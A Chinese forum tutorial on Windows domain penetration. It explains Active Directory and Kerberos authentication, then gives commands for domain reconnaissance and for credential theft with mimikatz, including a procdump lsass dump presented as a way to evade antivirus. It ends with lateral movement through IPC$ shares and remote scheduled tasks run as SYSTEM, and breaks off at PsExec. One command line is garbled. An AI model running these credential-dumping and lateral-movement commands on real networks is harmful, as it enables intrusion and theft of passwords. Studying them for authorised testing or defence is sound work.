域渗透技能大全

admin 发表于 2022-3-31 02:08:22

<div style="page:WordSection1;">

 

<div style="page:WordSection1;">

 

<h1 align="center" style="margin-bottom:.0001pt;margin-left:179.75pt;margin-right:184.75pt;margin-top:0cm;punctuation-wrap:simple;text-align:center;">
<a name="域渗透"></a>域渗透
</h1>

 


<a name="1、域的简单介绍"></a>1、域的简单介绍

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:6.0pt;margin-right:10.55pt;margin-top:18.8pt;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
将网络中多台计算机逻辑上组织到一起进行集中管理，这种区别于工作组的逻辑环境叫做域。域是由域控制器（Domain Controller）和成员计算机组成，域控制器就是安装了活动目录（Active Directory）的计算机。活动目录提供了存储网络上对象信息并使用网络使用该数据的方法。


 

<h3 style="punctuation-wrap:simple;tab-stops:34.1pt;">
<a name="1.1 工作组的缺点"></a>1.1      工作组的缺点
</h3>

 

<p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:45.6pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:45.65pt;text-autospace:none;text-indent:-21.05pt;">
2  没有统一的管理机制，

<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:45.6pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:45.65pt;text-autospace:none;text-indent:-21.05pt;">
2  没有对用户账户的统一的身份验证机制

<p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:45.6pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:45.65pt;text-autospace:none;text-indent:-21.05pt;">
2  没有统一查找网络资源的机制


 

<h3 style="margin-top:.05pt;punctuation-wrap:simple;tab-stops:34.1pt;">
<a name="1.2 域优势"></a>1.2      域优势
</h3>

 

<h6 style="margin-bottom:.0001pt;margin-left:27.0pt;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;">
活动目录的特点：
</h6>
<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:69.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:69.05pt;text-autospace:none;text-indent:-21.05pt;">
2  集中管理，可以集中的管理企业中成千上万分布于异地的计算机和用户。

<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:69.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:69.05pt;text-autospace:none;text-indent:-21.05pt;">
2  便捷的网络资源访问，能够容易的定位到域中的资源。

<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:69.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:69.05pt;text-autospace:none;text-indent:-21.05pt;">
2  用户一次登录就可访问整个网络资源，集中的身份验证。

<p style="font-family:等线;font-size:12.0pt;line-height:15.6pt;margin-bottom:0cm;margin-left:69.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:69.05pt;text-autospace:none;text-indent:-21.05pt;">
2  网络资源主要包含用户帐户、组、共享文件夹、打印机等

<p style="font-family:等线;font-size:12.0pt;line-height:15.7pt;margin-bottom:0cm;margin-left:69.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;tab-stops:69.05pt;text-autospace:none;text-indent:-21.05pt;">
2   可扩展性，既可以适用于几十台计算机的小规模网络，也可以适用于跨国公司。

</div>
 

<div style="page:WordSection2;">

<img width="554" height="340" src="https://www.2k8.org/content/uploadfile/202203/17/d3b6aea7.jpg" alt="" style="vertical-align:middle;" />


 


 

<h1 style="punctuation-wrap:simple;">
<a name="2、Kerberos协议简介"></a>2、Kerberos 协议简介
</h1>

Kerberos 是一种网络认证协议，其设计目标是通过密钥系统为客户机/服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证，无需基于主机地址的信任，不要求网络上所有主机的物理安全，并假定网络上传送的数据包可以被任意的读取、修改和插入数据。在以上情况下，Kerberos 作为一种可信任的第三方认证服务，是通过传统的密码技术（如：共享密钥）执行认证服务的。


 


 

<h3 style="margin-left:30.45pt;punctuation-wrap:simple;tab-stops:30.5pt;text-indent:-24.5pt;">
<a name="2.1 Kerberos协议框架"></a>2.1   Kerberos 协议框架
</h3>

 


Kerberos 协议中主要有三个角色：


1、访问服务的Client 2、提供服务的 Server


3、KDC(Key Distribution Center)密钥分发中心

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:6.0pt;margin-right:10.55pt;margin-top:.05pt;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
KDC 默认安装在域控中，而 Client 和 Server 为域内的用户或者服务，如web 应用、数据库服务器和邮件服务器等。Client 是否有权限访问 Server 端的服务由 KDC 发放的票据来决定。

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
如果把 Kerberos 中的票据比作一张火车票，那么 Client 端就是乘客，Server 就是火车， 而 KDC 就是火车站的认证系统。如果 Client 端的票据是合法的（由你本人身份证购买并且由你本人持有）同时有访问 Server 端服务的权限（车票对应车次正确）那么你才能上车。当然和火车票不同的是 Kerberos 中有两张票据，而火车票只有一张。

</div>
 

<div style="page:WordSection3;">

 


<img width="536" height="292" src="https://www.2k8.org/content/uploadfile/202203/17/956d1fb0.png" alt="" style="vertical-align:middle;" />


 


由上图可以看出，KDC 又分为两个部分:


Authentication Server: AS 的作用就是验证Client 的身份（确认你是身份证上的本人），验证通过就给一张TGT(Ticket Granting Ticket)票给 Client。


Ticket Granting Server:TGS 的作用就是通过 AS 发给Client 的票（TGT）换取访问 Server



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="187" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="540" height="415" src="https://www.2k8.org/content/uploadfile/202203/17/20cff092.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
端的票 ST（Server Ticket）。ST 也有资料称之为 TGS Ticket。

</div>
 

<div style="page:WordSection4;">
<h3 style="margin-bottom:.0001pt;margin-left:30.45pt;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;tab-stops:30.5pt;text-indent:-24.5pt;">
<a name="2.2 Kerberos认证流程"></a>2.2   Kerberos 认证流程
</h3>

 


当 Client 想要访问 Server 上的某个服务时，需要先向 AS 证明自己的身份，然后通过 AS


发放的 TGT 向 Server 发起认证请求，这个过程分为三块：


The Authentication Service Exchange: Client 与 AS 的交互


The Ticket Granting Service Exchange:Client 与 TGS 的交互


The Client/Server Authentication Exchange:Client 与 Server 的交互



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="185" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="549" height="344" src="https://www.2k8.org/content/uploadfile/202203/17/67760df9.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 



 

<h5 style="margin-left:24.0pt;punctuation-wrap:simple;tab-stops:24.05pt;">
(1)  The Authentication Service Exchange
</h5>
<h6 style="punctuation-wrap:simple;">
KRB_AS_REQ:
</h6>

Client->AS:发送 Authenticator1(Client 密码加密 TimeStamp)

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
第一步 Client 先向 KDC 的 AS 发送 Authenticator1,内容为通过 Client 密码 hash 加密的时间戳、Client ID、网络地址、加密类型等内容。

<h6 style="line-height:15.5pt;margin-top:0cm;punctuation-wrap:simple;">
KBR_AS_REP:
</h6>
<p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
AS->Client:发送 Client 密码加密的 sessionkey-as 和票据 TGT（KBRTGT HASH 加密的

<p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
sesionkey-as 和 Timestamp）

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
在 KDC 中存储了域中所有用户的密码 hash，当 AS 接受到 Client 的请求后会根据 KDC 中存储的密码来解密，解密成功并且验证信息。验证成功后返回给 Client 由Client 密码 hash 加密的 sessionkey-as 和 TGT（由 KBRTGT HASH 加密的 sessionkey-as 和 Timestamp 等信息）。

</div>
 

<div style="page:WordSection5;">

<img width="555" height="294" src="https://www.2k8.org/content/uploadfile/202203/17/37803ade.png" alt="" style="vertical-align:middle;" />


 

<h5 style="margin-bottom:.0001pt;margin-left:24.0pt;margin-right:0cm;margin-top:2.25pt;punctuation-wrap:simple;tab-stops:24.05pt;">
(2)  The Ticket Granting Service(TGS) Exchange
</h5>
<h6 style="punctuation-wrap:simple;">
KBR_TGS_REQ:
</h6>
<p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
Client->TGS 发送 Authenticator2(sessionkey-as 加密 timestamp)和票据 TGT(KBRTGT HASH

<p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
加密的 sessionkey-as 和 timestamp)

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
Client 接收到了加密的sessionkey-as 和TGT 后，用自身的密码解密得到sessionkey-as， TGT 是 KDC 密码加密的，Client 无法解密。这时 Client 再用 sessionkey-as 加密 timestamp 和 TGT 一起发送给 KDC 中的 TGS（Ticket Granting Server）票据授权服务器换取能够访问Server 的票据。

<h5 style="margin-top:6.3pt;punctuation-wrap:simple;text-indent:0cm;">
KBR_TGS-REP:
</h5>
<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:6.0pt;margin-right:10.65pt;margin-top:6.6pt;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
TGS->Client：发送密文（由 sessionkey-as 加密的 sessionkey-tgs）和票据 ST（由 server 密码 hash 加密的 sessionkey-tgs）

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
TGS 收到 Client 发送过来的 TGT 和 Sessionkey-as 加密的 TimeStamp 之后，首先会检查自身是否存在Client 所请求的服务。如果服务存在，则用 KRBTGT 密码解密 TGT。一般情况下TGS 会检查 TGT 中的时间戳查看 TGT 是否过期，且原始地址是否和 TGT 中保存的地址相同。验证成功之后将用 sessionkey-as 加密的 sessionkey-tgs 和 Server 密码 HASH 加密的Sessionkey-tgs 发送给Client。

</div>
 

<div style="page:WordSection6;">

<img width="544" height="289" src="https://www.2k8.org/content/uploadfile/202203/17/a7f35b1f.png" alt="" style="vertical-align:middle;" />


 

<h5 style="margin-bottom:.0001pt;margin-left:24.0pt;margin-right:0cm;margin-top:2.25pt;punctuation-wrap:simple;tab-stops:24.05pt;">
(3)  The Client/Server Authentication Exchange
</h5>

 


KBR_AP_REQ:

<p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:6.55pt;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
Client->Server 发送 Authenticator3(sessionkey-tgs 加密 timestamp)和票据 ST(Server 密码

<p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
hash 加密的 sessionkey-tgs)

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.75pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
Client 收到sessionkey-as 加密的sessionkey-tgs 和Server 密码hash 加密的sessionkey- tgs 之后用sessionkey-as 解密得到sessionkey-tgs，然后把 sessionkey-tgs 加密的timestamp和 ST 一起发送给 Server。

<h5 style="margin-top:6.35pt;punctuation-wrap:simple;text-indent:0cm;">
KBR_AP_REP:
</h5>

Server->Client :


Server 通过自己的密码解密 ST ，得到 sessionkey-tgs ，再用 sessionkey-tgs 解密 


Authenticator3 得到 timestamp，验证正确返回验证成功。



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="183" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="545" height="292" src="https://www.2k8.org/content/uploadfile/202203/17/6b8a80da.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 


</div>
 

<div style="page:WordSection7;">
<h1 style="line-height:32.4pt;punctuation-wrap:simple;">
<a name="3、域内信息收集"></a>3、域内信息收集
</h1>

 

<p style="font-family:等线;font-size:10.5pt;line-height:172%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.8pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
在拿到一台内网机器的时候，首先要确定是不是在域内。可通过以下命令来判断机器是否在域内，若命令能成功执行并返回结果则当前机器在域内，否则不在域内。

<h3 style="margin-top:9.85pt;punctuation-wrap:simple;tab-stops:34.1pt;">
<a name="3.1 判断是否是域环境"></a>3.1      判断是否是域环境
</h3>

 


net view /domain 查询域列表



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="553" height="107" src="https://www.2k8.org/content/uploadfile/202203/17/3f4f60c1.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 



net time /domain 从域控查询时间，若当前用户是域用户会从域控返回当前时间，亦用来判断主域，主域一般用做时间服务器


<img width="554" height="87" src="https://www.2k8.org/content/uploadfile/202203/17/6894e493.png" alt="" style="vertical-align:middle;" />



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="557" height="185" src="https://www.2k8.org/content/uploadfile/202203/17/6a923768.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
net localgroup administrators 本机管理员【通常含有域用户】


net user /domain 查询域用户（当前域）

</div>
 

<div style="page:WordSection8;">

<img width="552" height="175" src="https://www.2k8.org/content/uploadfile/202203/17/9728dd8a.png" alt="" style="vertical-align:middle;" />


net group /domain 查询域工作组



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="555" height="295" src="https://www.2k8.org/content/uploadfile/202203/17/16b4a279.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 



net group "domain computers" /domain 查看加入域的所有计算机名


<img width="551" height="172" src="https://www.2k8.org/content/uploadfile/202203/17/c899624d.png" alt="" style="vertical-align:middle;" />


net group "domain admins" /domain 查询域管理员用户组和域管用户

</div>
 

<div style="page:WordSection9;">

<img width="557" height="186" src="https://www.2k8.org/content/uploadfile/202203/17/bf9465ff.png" alt="" style="vertical-align:middle;" />


 


net localgroup administrators /domain 查看域管理员


<img width="553" height="228" src="https://www.2k8.org/content/uploadfile/202203/17/e54e6bdb.png" alt="" style="vertical-align:middle;" />



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="557" height="179" src="https://www.2k8.org/content/uploadfile/202203/17/2a4a2787.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
net group "domain controllers" /domain 查看域控


net accounts /domain 查看域密码策略

</div>
 

<div style="page:WordSection10;">

<img width="548" height="253" src="https://www.2k8.org/content/uploadfile/202203/17/421c600a.png" alt="" style="vertical-align:middle;" />


 


 

<h3 style="margin-top:1.3pt;punctuation-wrap:simple;tab-stops:34.1pt;">
<a name="3.2 定位域控"></a>3.2      定位域控
</h3>

 


1、通常域内主机DNS 地址就是域控地址


2、查看是否开启 53，389 等端口



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="552" height="447" src="https://www.2k8.org/content/uploadfile/202203/17/634741e0.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
3、ping 域控计算机名

</div>
 

<div style="page:WordSection11;">

<img width="553" height="128" src="https://www.2k8.org/content/uploadfile/202203/17/b72d5d5a.png" alt="" style="vertical-align:middle;" />


 


<img width="556" height="187" src="https://www.2k8.org/content/uploadfile/202203/17/1ca576ba.png" alt="" style="vertical-align:middle;" />


 


 

<h3 style="margin-bottom:.0001pt;margin-left:6.0pt;margin-right:0cm;margin-top:1.3pt;punctuation-wrap:simple;text-indent:0cm;">
<a name="3.2 非域信息收集"></a>3.2 非域信息收集
</h3>

 


1、盲扫C 端、B 段等


2、查看arp 表、路由表


3、找配置文件，如数据库配置等



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="497" height="228" src="https://www.2k8.org/content/uploadfile/202203/17/08f70f95.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 


</div>
 

<div style="page:WordSection12;">

<img width="551" height="365" src="https://www.2k8.org/content/uploadfile/202203/17/b2ace750.png" alt="" style="vertical-align:middle;" />


 


 

<h1 style="line-height:normal;margin-top:8.8pt;punctuation-wrap:simple;">
<a name="4、域内横向移动"></a>4、域内横向移动
</h1>

 

<h3 style="punctuation-wrap:simple;tab-stops:34.1pt;">
<a name="4.1 凭据窃取"></a>4.1      凭据窃取
</h3>

 


窃取凭据来帮助在域内横向移动。抓密码 hash 的工具有很多，例如 wce、getpass、QuarksPwDump_v0.1、Pwdump7 等等。介绍几个比较好用且自己常用的工具。


 


<a name="4.1.1 mimikatz"></a>4.1.1    mimikatz


 


用法：


mimikatz # privilege::debug （提升权限）


Privilege '20' OK


mimikatz # sekurlsa::logonpasswords （抓取明文密码和 hash） Github 地址：<a href="https://github.com/gentilkiwi/mimikatz">https://github.com/gentilkiwi/mimikatz</a>

</div>
 

<div style="page:WordSection13;">

<img width="552" height="394" src="https://www.2k8.org/content/uploadfile/202203/17/d9fdb887.png" alt="" style="vertical-align:middle;" />


 


 


 

<h2 style="margin-top:1.25pt;punctuation-wrap:simple;tab-stops:44.8pt;">
<a name="4.1.2 procdump+mimikatz"></a>4.1.2    procdump+mimikatz
</h2>

 


Procdump 是微软官方发布的一款调试工具，因此不会被各种杀毒软件查杀。可使用


procdump 加 mimikatz 来躲避杀软检测。


官方下载地址：<a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump">https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump</a>


 


1、使用procdump 将目标的 lsass.exe 转储成 dmp 文件


procdump64.exe -accepteula -ma lsass.exe lsass.dmp

</div>
 

<div style="page:WordSection14;">

<img width="551" height="299" src="https://www.2k8.org/content/uploadfile/202203/17/148ffec9.jpg" alt="" style="vertical-align:middle;" />


 


2、使用 mimikatz 从转储的 lsass.dmp 中来读取明文密码


mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="181" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="549" height="453" src="https://www.2k8.org/content/uploadfile/202203/17/06314630.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 


</div>
 

<div style="page:WordSection15;">
<h2 style="margin-top:.7pt;punctuation-wrap:simple;tab-stops:44.8pt;">
<a name="4.1.3 LaZagne"></a>4.1.3    LaZagne
</h2>

 



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="556" height="617" src="https://www.2k8.org/content/uploadfile/202203/17/5fbba9aa.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
一款抓密码的神器，可以抓取系统密码、浏览器密码、wifi 密码等等。

</div>
 

<div style="page:WordSection16;">

<img width="554" height="482" src="https://www.2k8.org/content/uploadfile/202203/17/130e8c84.png" alt="" style="vertical-align:middle;" />


 


 


 

<h3 style="margin-top:1.25pt;punctuation-wrap:simple;tab-stops:34.1pt;">
<a name="4.2 横向移动"></a>4.2      横向移动
</h3>

 


横向移动的常用方法和工具。


 

<h2 style="punctuation-wrap:simple;tab-stops:44.8pt;">
<a name="4.2.1 IPC+计划任务"></a>4.2.1    IPC+计划任务
</h2>

 

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
进程间通信（IPC，Inter-Process Communication），指至少两个进程或线程间传送数据或者信号的一些技术或方法。


 


 

<h4 style="margin-top:.05pt;punctuation-wrap:simple;tab-stops:48.15pt;">
<a name="4.2.1.1 IPC利用条件"></a>4.2.1.1   IPC 利用条件
</h4>

 

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
1、139 或 445 端口开启:ipc 连接可以实现远程登录及对默认共享的访问；而 139 端口的开启表示netbios 协议的应用，我们可以通过 139、445 端口实现对共享文件/打印机的访问

</div>
 

<div style="page:WordSection17;">

2、管理员开启了默认共享：默认共享是为了方便管理员远程管理而默认开启的共享，即所有的逻辑盘（C$、d$、e$...）和系统目录 winnt 或者windows（admin$）


 

<h4 style="margin-left:51.25pt;punctuation-wrap:simple;tab-stops:51.3pt;text-indent:-45.3pt;">
<a name="4.2.1.2 建立IPC连接、copy文件、创建计划任务"></a>4.2.1.2    建立IPC 连接、copy 文件、创建计划任务
</h4>

 


net user \\192.168.19.169\c$ test@123 /user:adtest\jeff1 copy 1.bat \\192.168.19.169\c$


 


net time \\192.168.19.169


at \\192.168.19.169 1:03 c:\1.bat



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="555" height="273" src="https://www.2k8.org/content/uploadfile/202203/17/8e0ce59a.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 



 


 


schtasks

<p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:5.0pt;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">

<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="559" height="165" src="https://www.2k8.org/content/uploadfile/202203/17/65c80783.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
由于 at 在新版本的系统中已被弃用，我们需要用schtasks 替代


 

<p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
schtasks /create /s 192.168.19.177 /u adtest\jeff1 /p test@123 /ru "SYSTEM" /tn test /sc DAILY

<p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
/tr c:\1.bat /F

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
创建计划任务，/s 指定远程机器名或 ip 地址，/ru 指定运行任务的用户权限，这里指定为最高的 SYSTEM，/tn 是任务名称，/sc 是任务运行频率，这里指定为每天运行，并没什么实际意义，/tr 指定运行的文件，/F 表示如果指定的任务已经存在，则强制创建任务并抑制警告

</div>
 

<div style="page:WordSection18;">

<img width="551" height="401" src="https://www.2k8.org/content/uploadfile/202203/17/408e7330.png" alt="" style="vertical-align:middle;" />


 


 


运行任务，其中/i 表示立即运行



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="556" height="69" src="https://www.2k8.org/content/uploadfile/202203/17/83f70c18.png" alt=": " style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 
schtasks /run /s 192.168.19.177 /u adtest\jeff1 /p test@123 /tn test /i

</div>
 

<div style="page:WordSection19;">

<img width="553" height="357" src="https://www.2k8.org/content/uploadfile/202203/17/fde1c550.png" alt="" style="vertical-align:middle;" />


 


删除计划任务


schtasks /delete /s 192.168.19.177 /u adtest\jeff1 /p test@123 /tn test /f



<table cellpadding="0" cellspacing="0" align="left">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
<img width="553" height="454" src="https://www.2k8.org/content/uploadfile/202203/17/c3e3a6d9.png" alt="" style="vertical-align:middle;" />
</td>
</tr>
</tbody>
</table>
 


</div>
 

<div style="page:WordSection20;">
<h4 style="margin-top:1.2pt;punctuation-wrap:simple;tab-stops:48.15pt;">
<a name="4.2.1.3 IPC常见错误"></a>4.2.1.3   IPC 常见错误
</h4>

 


错误号 5，拒绝访问：很可能你使用的用户不是管理员权限的，先提升权限；错误号 51，Windows 无法找到网络路径 : 网络有问题；


错误号 53，找不到网络路径  ： ip 地址错误；目标未开机；目标 lanmanserver 服务未启动；目标有防火墙（端口过滤）；

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
错误号 67，找不到网络名：你的 lanmanworkstation 服务未启动；目标删除了 ipc$；错误号 1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个 ipc$，请删除再连。

<p style="font-family:等线;font-size:10.5pt;line-height:15.45pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
错误号 1326，未知的用户名或错误密码：原因很明显了；

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
错误号 1792，试图登录，但是网络登录服务没有启动：目标 NetLogon 服务未启动。（连接域控会出现此情况）

<p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
错误号 2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。


 

<h4 style="punctuation-wrap:simple;tab-stops:48.15pt;">
<a name="4.2.1.4 PsTools"></a>4.2.1.4   PsTools
</h4>

 

<p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
PsTools 是 sysinternals 开发的一个功能强大的安全管理工具包，最新版目前共有 13 个各种功能的小工具。这里介绍下 psexec，psexec 是一款远程执行命令的工具，在内网渗透的时候常它来进行横向移动。


下载地址：<a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec">https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec</a>

</div>
 

<div style="page:WordSection21;">

<img width="553" height="507" src="https://www.2k8.org/content/uploadfile/202203/17/17ae5694.png" alt="" style="vertical-align:middle;" />


 

<h6 style="line-height:normal;margin-top:2.65pt;punctuation-wrap:simple;">
PsExec
</h6>

 


1、若已建立 IPC$连接，无需再次输入账号密码，所有 pstools 工具可直接使用



<table cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td width="180" height="0">
</td>
</tr>
<tr>
<td>
</td>
<td>
